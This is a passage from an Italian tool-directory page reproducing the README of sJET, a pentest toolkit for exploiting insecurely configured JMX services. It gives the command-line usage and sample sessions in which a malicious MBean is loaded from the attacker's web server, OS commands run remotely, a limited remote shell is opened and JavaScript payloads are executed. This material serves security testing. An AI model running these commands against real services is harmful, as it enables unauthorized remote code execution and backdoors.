Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sjet — siberas toolkit di sfruttamento JMX | Kitploit
Strumenti/GitHubGitHub/siberas/sjet
Generazione di PayloadExploitCommand and ControlStrumento di Accesso Remoto
GitHubsiberas/sjet

sjet

siberas toolkit di sfruttamento JMX

Vedi Repository
133915 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

sJET di siberas

siberas JMX Exploitation Toolkit

sJET consente un facile sfruttamento di servizi JMX configurati in modo insicuro. Ulteriori informazioni di base sono disponibili qui e qui.

Prerequisiti

  • Jython 2.7

Utilizzo

SJET implementa un'interfaccia CLI (usando argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Dove

  • targetHost - l'indirizzo IP del target
  • targerPort - la porta del target su cui JMX è in esecuzione
  • password - la password che è stata impostata durante l'installazione
  • MODE - la modalità dello script
  • modeOptions - le opzioni per la modalità selezionata

Modalità e modeOptions

  • install - installa il payload nel target corrente
    • payload_url - URL completo per caricare il payload
    • payload_port - porta per caricare il payload
  • uninstall - disinstalla il payload dal target corrente
  • password - cambia la password su un payload già distribuito
    • password - la nuova password
  • command - esegue il comando CMD nel targetHost
    • CMD - il comando da eseguire
  • shell - avvia una semplice shell nel targetHost (con le limitazioni di java.lang.Runtime.exec())
  • javascript - esegue un file javascript FILENAME nel targetHost
    • FILENAME - il javascript da eseguire

Esempio

Installazione del MBean payload su un servizio JMX vulnerabile

Nell'esempio seguente, il servizio JMX vulnerabile è in esecuzione su 192.168.11.136:9991, l'attaccante ha l'indirizzo IP 192.168.11.132. Il servizio JMX si collegherà al servizio web dell'attaccante per scaricare il file jar del payload. sJET avvierà il servizio web necessario sulla porta 8000.

Dopo l'installazione riuscita del MBean, la password predefinita viene cambiata con quella fornita dalla riga di comando ("super_secret").

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Esecuzione del comando 'ls -la' in un target Linux:

Dopo che il payload è stato installato, possiamo usarlo per eseguire comandi del sistema operativo sul target.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

Esecuzione di ping in modalità shell su un target

Se non vuoi caricare Java per ogni comando, puoi usare la "modalità shell" per ottenere una shell dei comandi limitata.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

Invocare un payload JavaScript su un target:

Lo script di esempio "javaproperties.js" mostra le proprietà Java del servizio vulnerabile. Può essere invocato come segue:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

Cambiare la password

Cambia la password esistente ("super_secret") in "this-is-the-new-password":

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

Disinstallare il MBean payload dal target

Disinstalla il payload 'Siberas' dal target:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

Contribuire

Sentiti libero di contribuire.

Autori

  • Hans-Martin Münch - Initial idea and work - h0ng10
  • Patricio Reller - CLI and extra options - preller

Vedi anche la lista dei contributori che hanno partecipato a questo progetto.

Licenza

Questo progetto è concesso in licenza sotto la MIT License - vedi il file LICENSE per i dettagli.

Scarica lo strumento